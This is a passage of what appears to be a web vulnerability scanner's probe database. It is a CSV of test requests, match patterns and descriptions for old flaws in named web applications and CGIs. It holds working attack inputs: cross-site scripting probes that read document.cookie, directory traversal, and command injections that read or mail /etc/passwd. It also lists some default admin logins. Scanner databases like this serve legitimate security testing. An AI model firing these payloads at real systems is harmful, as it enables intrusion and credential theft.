"000880","","4","/index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search","GET","<script>alert\(document\.cookie\)<\/script>","","","","","eZ publish v3 and prior allow Cross Site Scripting (XSS).","","" "000881","CVE-2003-1187","4","/include.php?path=contact.php&contact_email=\"><script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","PHPKIT is vulnerable to Cross Site Scripting (XSS).","","" "000882","","4","/html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\);<\/script>","","","","","myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS).","","" "000883","","4","/html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\);<\/script>","","","","","myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS).","","" "000884","","4","/html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This CGI is vulnerable to Cross Site Scripting (XSS).","","" "000885","OSVDB-2754","4","/guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E","GET","200","","","","","MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.","","" "000886","CVE-2003-0614","4","/gallery/search.php?searchstring=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.","","" "000887","CVE-2001-1524","4","/friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.","","" "000888","OSVDB-2946","4","/forum_members.asp?find=%22;}alert(9823);function%20x()\{v%20=%22","GET","200","alert\(9823\)","","The\sdocument\shas\smoved","","Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS).","","" "000889","OSVDB-2739","4","/forums/index.php?top_message=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<script>","","","","","Led-Forums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS).","","" "000890","CVE-2006-6133,CVE-2002-1845","4","/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page.","","" "000891","CVE-2002-0958","4","/forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","php(Reactor) is vulnerable to Cross Site Scripting (XSS).","","" "000892","CVE-2003-0763","4","/esp?PAGE=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Escapade Scripting Engine is vulnerable to Cross Site Scripting (XSS).","","" "000893","CVE-2002-1027","4","/error/500error.jsp?et=1<script>alert('Vulnerable')</script>;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages.","","" "000894","OSVDB-59095","4","/downloads/pafiledb.php?action=rate&id=4?\"<script>alert('Vulnerable')</script>\"","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS).","","" "000895","OSVDB-59095","4","/downloads/pafiledb.php?action=email&id=4?\"<script>alert('Vulnerable')</script>\"","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS).","","" "000896","OSVDB-59095","4","/downloads/pafiledb.php?action=download&id=4?\"<script>alert('Vulnerable')</script>\"","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS).","","" "000897","","4","/download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This version of PHP-Nuke's download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.","","" "000898","","4","/default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E","GET","<script language=javascript>window\.alert\(document\.cookie\);<\/script>","","","","","osCommerce is vulnerable to Cross Site Scripting (XSS).","","" "000899","","4","/default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E","GET","<script language=javascript>window\.alert\(document\.cookie\);<\/script>","","","","","osCommerce is vulnerable to Cross Site Scripting (XSS).","","" "000900","CVE-2002-0958","4","/comments/browse.php?fid=2&tid=4&go=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","php(Reactor) v1.2.7 and older are vulnerable to Cross Site Scripting (XSS).","","" "000901","","4","/comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.","","" "000902","OSVDB-50619","4","/cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>","GET","<script>alert\(1\)<\/script>","","","","","RSA ClearTrust allows Cross Site Scripting (XSS).","","" "000903","OSVDB-50619","4","/cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\"><script>alert(1)/script><\"","GET","<script>alert\(1\)<\/script>","","","","","RSA ClearTrust allows Cross Site Scripting (XSS).","","" "000904","","4","/chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>","GET","alert\(\"Vulnerable\"\)<\/script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS).","","" "000905","https://vulners.com/osvdb/OSVDB:651","4","/cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This CGI is vulnerable to Cross Site Scripting (XSS).","","" "000906","https://vulners.com/osvdb/OSVDB:651","4","/cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This CGI is vulnerable to Cross Site Scripting (XSS).","","" "000907","OSVDB-42015","4","@CGIDIRStest2.pl?<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Default Monkey server script is vulnerable to Cross Site Scripting (XSS).","","" "000908","https://seclists.org/bugtraq/2003/Oct/63","4","/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E","GET","alert\(\"alert\"\)","","","","","Cobalt RaQ Web Control Panel is vulnerable to Cross Site Scripting (XSS).","","" "000909","CVE-2003-1536","4","/calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05","GET","<script>alert\(document\.cookie\);<\/script>","","","","","DCP-Portal v5.3.1 is vulnerable to Cross Site Scripting (XSS).","","" "000910","CVE-2002-1732","4","/ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS).","","" "000911","CVE-2002-1732","4","/ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS).","","" "000912","CVE-2002-1732","4","/bb000001.pl<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS).","","" "000913","CVE-2002-2178","4","/article.php?sid=\"><Img%20Src=javascript:alert('Vulnerable')><Img%20Src=\"","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpWebSite 0.8.3 is vulnerable to Cross Site Scripting (XSS).","","" "000914","","4","/article.cfm?id=1'<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\);<\/script>","","","","","With malformed URLs, ColdFusion is vulnerable to Cross Site Scripting (XSS).","","" "000915","https://www.mail-archive.com/bugtraq@securityfocus.com/msg11627.html","4","/apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS).","","" "000916","","4","/anthill/login.php","GET","200","","","","","Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS and may allow users to bypass login requirements.","","" "000917","","4","/admin/login.php?path=\"></form><form%20name=a><input%20name=i%20value=XSS><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","mcNews 1.1a from phpforums.net is vulnerable to Cross Site Scripting (XSS).","","" "000918","CVE-2003-0504","4","/addressbook/index.php?surname=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS).","","" "000919","CVE-2003-0504","4","/addressbook/index.php?name=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS).","","" "000920","https://seclists.org/vuln-dev/2002/Apr/270","4","/add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Admanager 1.1 is vulnerable to Cross Site Scripting (XSS).","","" "000921","","4","/a?<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.","","" "000922","","4","/a.jsp/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ.","","" "000923","CVE-2003-1243","4","/?mod=<script>alert(document.cookie)</script>&op=browse","GET","<script>alert\(document\.cookie\)","","","","","Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS).","","" "000924","","4","/<script>alert('Vulnerable')</script>.thtml","GET","<script>alert\('Vulnerable'\)<\/script>\.thtml","","","","","Server is vulnerable to Cross Site Scripting (XSS).","","" "000925","","4","/<script>alert('Vulnerable')</script>.shtml","GET","<script>alert\('Vulnerable'\)<\/script>\.shtml","","","","","Server is vulnerable to Cross Site Scripting (XSS).","","" "000926","","4","/<script>alert('Vulnerable')</script>.jsp","GET","<script>alert\('Vulnerable'\)<\/script>\.jsp","","","","","Server is vulnerable to Cross Site Scripting (XSS).","","" "000927","","4","/<script>alert('Vulnerable')</script>.aspx","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net).","","" "000928","CVE-2003-1347","4","//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GeekLog 1.3.7 allows Cross Site Scripting (XSS).","","" "000929","CVE-2003-1347","4","//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GeekLog 1.3.7 allows Cross Site Scripting (XSS).","","" "000930","","4","/<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server is vulnerable to Cross Site Scripting (XSS) with HTML-encoded requests.","","" "000931","","4","/%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server allows Cross Site Scripting (XSS) in 404 error messages if the code is in a directory. This may be Falcon web server.","","" "000932","","4","/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.","","" "000933","","4","/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.","","" "000934","","4","/%22%3cscript%3ealert(%22xss%22)%3c/script%3e","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.","","" "000935","CVE-2002-1533","4","/%0a%0a<script>alert(\"Vulnerable\")</script>.jsp","GET","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","Jetty JSP servlet engine is vulnerable to Cross Site Scripting (XSS).","","" "000936","CVE-2002-2115","4","@CGIDIRStitle.cgi","GET","200","","","","","HNS's title.cgi is vulnerable to Cross Site Scripting (XSS CA-2000-02) in version 2.00 and earlier, and Lite 0.8 and earlier.","","" "000937","CVE-2002-1680","34","@CGIDIRScompatible.cgi","GET","200","","","","","This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS).","","" "000938","","34","/add_user.php","GET","output started at \/","","","","","DCP-Portal reveals system path. Upgrade to a version higher than 4.2. This version is also vulnerable to Cross Site Scripting (XSS).","","" "000939","","1","@CGIDIRSprobecontrol.cgi?command=enable&username=cancer&password=killer","GET","200","","","","","This might be interesting: has been seen in web logs from a scanner.","","" "000940","CVE-2002-0226","1","@CGIDIRSretrieve_password.pl","GET","200","","","","","retrieve_password.pl in DCForum 6.x and 2000 generates predictable new passwords based on a sessionID.","","" "000941","","1e","@CGIDIRSwwwadmin.pl","GET","200","","","","","Administration CGI?","","" "000942","","1","/cfdocs/expeval/displayopenedfile.cfm","GET","200","","not found","","","Unknown vuln","","" "000943","","1","/cfdocs/expeval/sendmail.cfm","GET","200","","","","","Can be used to send email; go to the page and fill in the form","","" "000944","CVE-1999-1550","1ab","/cgi-bin/bigconf.cgi","GET","200","","","","","BigIP Configuration CGI","","" "000945","","1b","@CGIDIRSwebmap.cgi","GET","200","","","","","nmap front end... could be fun","","" "000946","","1b","@CGIDIRSwwwwais","GET","UNISYS WEB SEARCH ENGINE","","","","","Unisys web server wais search found.","","" "000947","","1b","/ammerum/","GET","200","","","","","Ammerum pre 0.6-1 had several security issues.","","" "000948","","1b","/ariadne/","GET","200","","","","","Ariadne pre 2.1.2 has several vulnerabilities. The default login/pass to the admin page is admin/muze.","","" "000949","","1b","/cbms/cbmsfoot.php","GET","200","","","","","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/","","" "000950","","1b","/cbms/changepass.php","GET","200","","","","","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/","","" "000951","","1b","/cbms/editclient.php","GET","200","","","","","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/","","" "000952","","1b","/cbms/passgen.php","GET","200","","","","","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/","","" "000953","","1b","/cbms/realinv.php","GET","200","","","","","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/","","" "000954","","1b","/cbms/usersetup.php","GET","200","","","","","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/","","" "000955","","1be","@CGIDIRSadmin/admin.cgi","GET","200","","","","","May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.","","" "000956","","1be","@CGIDIRSadmin/setup.cgi","GET","200","","","","","May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio.","","" "000957","","2","@CGIDIRSmt-static/mt-load.cgi","GET","200","","","","","Movable Type weblog installation CGI found. May be able to reconfigure or reload.","","" "000958","","2","@CGIDIRSmt-static/mt.cfg","GET","configuration file","","","","","Movable Type configuration file found. Should not be available remotely.","","" "000959","","2","@CGIDIRSmt/mt-load.cgi","GET","200","","","","","Movable Type weblog installation CGI found. May be able to reconfigure or reload.","","" "000960","","2","@CGIDIRSmt/mt.cfg","GET","configuration file","","","","","Movable Type configuration file found. Should not be available remotely.","","" "000961","CVE-2000-1205,CVE-2007-4049","2","/cgi-bin-sdb/printenv","GET","\/usr\/bin\/perl","","","","","SuSe is configured with a link from cgi-bin-sdb to cgi-bin. Change the accompanying 'Alias' to 'ScriptAlias' in httpd.conf. BID-4431.","","" "000962","CVE-2005-0595","12","/ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C","GET","200","","","","","This check (A) sets up the next BadBlue test (B) for possible exploit.","","" "000963","OSVDB-59412","23","/db/users.dat","GET","200","","","","","upb PB allows the user database to be retrieved remotely.","","" "000964","","3","@CGIDIRScgiwrap/~@USERS","GET","UID of script userid","","","","","cgiwrap can be used to enumerate user accounts. Recompile cgiwrap with the '--with-quiet-errors' option to stop user enumeration.","","" "000965","","3","@CGIDIRScgiwrap/~JUNK(5)","GET","unable to find the user","","","","","Based on error message, cgiwrap can likely be used to find valid user accounts. Recompile cgiwrap with the '--with-quiet-errors' option to stop user enumeration.","","" "000966","","3","@CGIDIRScgiwrap/~root","GET","UID of script userid","","","","","cgiwrap can be used to enumerate user accounts. Recompile cgiwrap with the '--with-quiet-errors' option to stop user enumeration.","","" "000967","","3","@CGIDIRSdbman/db.cgi?db=no-db","GET","200","","","","","This CGI allows remote attackers to view system information.","","" "000968","CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html","23","@CGIDIRSdcshop/auth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely.","","" "000969","CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html","23","/dcshop/auth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely.","","" "000970","CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html","23","/dcshop/orders/orders.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely.","","" "000971","CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html","23","@CGIDIRSdcshop/orders/orders.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely.","","" "000972","","3","@CGIDIRSdumpenv.pl","GET","200","","","","","This CGI gives a lot of information to attackers.","","" "000973","CVE-2000-0208","3","@CGIDIRShtsearch?-c/nonexistent","GET","Unable to read configuration file '\/nonexistent'","","","","","The ht::/Dig install may let an attacker force ht://Dig to read arbitrary config files for itself.","","" "000974","","3","@CGIDIRSmkilog.exe","GET","200","","","","","This CGI can give an attacker a lot of information.","","" "000975","","3","@CGIDIRSmkplog.exe","GET","200","","","","","This CGI can give an attacker a lot of information.","","" "000977","","3","@CGIDIRSprocessit.pl","GET","200","","","","","This CGI returns environment variables, giving attackers valuable information.","","" "000978","","3","@CGIDIRSrpm_query","GET","200","","","","","This CGI allows anyone to see the installed RPMs","","" "000979","","3","@CGIDIRSsawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3","GET","Unknown configuration","","","","","The Sawmill CGI allows attackers to read the Sawmill password.","","" "000981","CVE-2001-0821","3","@CGIDIRSshop/orders/orders.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely.","","" "000982","","3","@CGIDIRSws_ftp.ini","GET","200","","","","","Can contain saved passwords for ftp sites","","" "000983","","3","@CGIDIRSWS_FTP.ini","GET","200","","","","","Can contain saved passwords for ftp sites","","" "000984","https://securiteam.com/unixfocus/5OP041P6BE/","3","/?sql_debug=1","GET","SQL query:","","","","","The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.","","" "000985","","3","/a_security.htm","GET","name=\"viewingpasswrd\" value=","","","","","Polycom ViewStation FX Release v4.2 reveals the admin password in the change password form's HTML.","","" "000986","https://packetstormsecurity.com/files/32406/xmas.txt.html","3","/Admin_files/order.log","GET","200","","","","","Selena Sol's WebStore 1.0 exposes order information.","","" "000987","OSVDB-59092","3e","/admin.html","GET","MySimpleNews - Administration","","","","","MySimpleNews contains the admin password in the login page HTML.","","" "000988","http://www.mybboard.com","3","/admin/cplogfile.log","GET","200","","","","","DevBB 1.0 final log file is readable remotely. Upgrade to the latest version.","","" "000989","","3","/admin/system_footer.php","GET","200","","","","","myphpnuke version 1.8.8_final_7 reveals detailed system information.","","" "000990","","3","/cfdocs/snippets/fileexists.cfm","GET","200","","","","","Can be used to verify the existence of files (on the same drive info as the web tree/file)","","" "000991","","3","/cgi-bin/MachineInfo","GET","200","","","","","Gives out information on the machine.","","" "000992","OSVDB-59646","3","/chat/!nicks.txt","GET","200","","","","","WF-Chat 1.0 Beta allows retrieval of user information.","","" "000993","OSVDB-59645","3","/chat/!pwds.txt","GET","200","","","","","WF-Chat 1.0 Beta allows retrieval of user information.","","" "000994","OSVDB-53304","3","/chat/data/usr","GET","200","","","","","SimpleChat! 1.3 allows retrieval of user information.","","" "000995","","3","/com","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Java class files may be browsable.","","" "000996","","3","/COM","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Java class files may be browsable.","","" "000997","","3","/config.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","","" "000998","","3","/config/","GET","200","","","","","Configuration information may be available remotely.","","" "000999","https://securitytracker.com/id/1004318,http://www.xmbforum.com","3","/cplogfile.log","GET","200","","","","","XMB Magic Lantern forum 1.6b final log file is readable remotely. Upgrade to the latest version.","","" "001000","https://seclists.org/fulldisclosure/2003/Dec/15","3","/cutenews/index.php?debug","GET","PHP Version","","","","","Cutenews 1.3 contains an information disclosure bug that reveals standard 'phpinfo' page output.","","" "001001","","3","/examples/jsp/snp/anything.snp","GET","200","","","","","Tomcat servlet gives lots of host information.","","" "001002","","3","/file-that-is-not-real-2002.php3","GET","Unable to open","","","","","PHP is configured to show the web root when sending error messages. Set display_errors to 'off'.","","" "001003","","3","/index.php?sql_debug=1","GET","SQL query:","","","","","The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.","","" "001004","","37","@CGIDIRSview-source?view-source","GET","200","","","","","This allows remote users to view source code.","","" "001005","","37","@CGIDIRSwebplus?about","GET","Product Information","","","","","Webplus may divulge product information, including version numbers. Version 4.X and below have a file read vulnerability.","","" "001006","","37","/cfdocs/snippets/viewexample.cfm","GET","200","","not found","","","This can be used to view .cfm files, request viewexample.cfm?Tagname=..\..\..\file (.cfm is assumed)","","" "001007","","3a","/chassis/config/GeneralChassisConfig.html","GET","Chassis Configuration","","","","","The Cabletron switch may allow remote configuration, or data retrieval, through the web interface.","","" "001008","CVE-2001-0839","3b","@CGIDIRSibill.pm","GET","200","","","","","iBill.pm is installed. This may allow brute forcing of passwords.","","" "001009","CVE-2002-0311","3b","@CGIDIRSscoadminreg.cgi","GET","200","","","","","This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.","","" "001010","OSVDB-4663","3b","@CGIDIRSSGB_DIR/superguestconfig","GET","200","","","","","Super GuestBook 1.0 from lasource.r2.ru stores the admin password in a plain text file.","","" "001011","","4","/hp/device/this.LCDispatcher","GET","Printer Serial Number","","","","","The Hewlett Packard Color LaserJet 4550 may allow unauthenticated users to permanently include links (and other data) in the web interface.","","" "001012","","6","/cfdocs/snippets/evaluate.cfm","GET","200","","","","","This allows you to enter Coldfusion code to be evaluated, or potentially create denial of service.","","" "001013","","6","/cfide/Administrator/startstop.html","GET","200","","","","","Can start/stop the Coldfusion server","","" "001014","","7","@CGIDIRSicat","GET","200","","","","","Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running.","","" "001015","CVE-2002-1528","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","Failed to read the maskfile","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","","" "001016","CVE-2002-1528","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","MondoSearch for Web Sites 4\.0","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","","" "001017","CVE-2002-1528","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","MondoSearch for Web Sites 4\.1","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","","" "001018","CVE-2002-1528","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","MondoSearch for Web Sites 4\.2","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","","" "001019","CVE-2002-1528","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","MondoSearch for Web Sites 4\.3","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","","" "001020","","7","@CGIDIRSnph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0","GET","200","","","","","nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug","","" "001021","","7","@CGIDIRSquery?mss=%2e%2e/config","GET","MGMT_PW","","","","","The Altavista search service allows attackers to read any file on the server.","","" "001022","","7","@CGIDIRStest-cgi?/*","GET","\/tmp","","","","","This CGI allows files to read remotely.","","" "001023","CVE-2002-1411","7","@CGIDIRSupdate.dpgs","GET","200","","","","","Duma Photo Gallery System may allow remote users to write to any file on the system. This could not be remotely tested.","","" "001024","","7","@CGIDIRSview-source","GET","200","","","","","This may allow remote arbitrary file retrieval.","","" "001025","","7","@CGIDIRSwrap","GET","200","","","","","This CGI lets users read any file with 755 perms. It should not be in the CGI directory.","","" "001026","","7","/Mem/dynaform/FileExplorer.htm","GET","File Explorer","","","","","The Nortel MIRAN device allows unauthenticated users to view the contents of the system's drive.","","" "001027","","78","@CGIDIRSFormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com","GET","root:","","","","","This CGI allows attackers to read files and execute commands remotely.","","" "001028","","78","@CGIDIRSlastlines.cgi?process","POST","root:","","","","","This CGI lets attackers read arbitrary files and/or execute commands.","num_lines=1000&log_location=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","" "001029","CVE-2000-0432","8","@CGIDIRScalendar_admin.pl?config=|cat%20/etc/passwd|","GET","root:","","","","","This CGI allows attackers to execute commands on the server.","","" "001030","CVE-2000-0432","8","@CGIDIRScalendar/calendar_admin.pl?config=|cat%20/etc/passwd|","GET","root:","","","","","This CGI allows attackers to execute commands on the server.","","" "001031","CVE-1999-0146","8","@CGIDIRScampas?%0acat%0a/etc/passwd%0a","GET","root:","","","","","NCSA campas allows attackers to execute commands on the server.","","" "001032","OSVDB-650","8","@CGIDIRScgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","CGIEmail's cgicso allows attackers to execute remote commands.","","" "001033","","8","@CGIDIRScgiwrap","GET","200","","","","","Some versions of cgiwrap allow anyone to execute commands remotely.","","" "001034","CVE-2001-0997","8","@CGIDIRScommon/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|","GET","resolv\.conf","","","","","Allows attacker to execute commands as http daemon. Upgrade or remove.","","" "001035","","8","@CGIDIRSCount.cgi","GET","200","","","","","This may allow attackers to execute arbitrary commands on the server","","" "001036","OSVDB-59544","8","@CGIDIRScsChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')","GET","root:","","","","","Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.","","" "001037","OSVDB-59542","8","@CGIDIRScsGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')","GET","root:","","","","","Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.","","" "001038","OSVDB-59543","8","@CGIDIRScsLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')","GET","root:","","","","","Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.","","" "001039","OSVDB-59545","8","@CGIDIRScsNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')","GET","root:","","","","","Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.","","" "001040","","8","@CGIDIRSecho.bat","GET","200","","","","","This CGI may allow attackers to execute remote commands.","","" "001041","","8","@CGIDIRSformmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","GET","root:","","","","","This CGI allows attackers to retrieve arbitrary files from the server.","","" "001042","OSVDB-4571","8","@CGIDIRSImageFolio/admin/admin.cgi","GET","200","","","","","ImageFolio (default account Admin/ImageFolio) may allow files to be deleted via URLs like: ?cgi=remove.pl&uid=111.111.111.111&rmstep=2&category=../../../../../../../../../../../etc/","","" "001043","CVE-1999-0266","8","@CGIDIRSinfo2www%20'(../../../../../../../bin/mail%20root%20</etc/passwd>","GET","root:","","","","","This CGI allows attackers to execute commands. passwd file may have been mailed to root.","","" "001044","","8","@CGIDIRSinfo2www","GET","200","","","","","This CGI allows 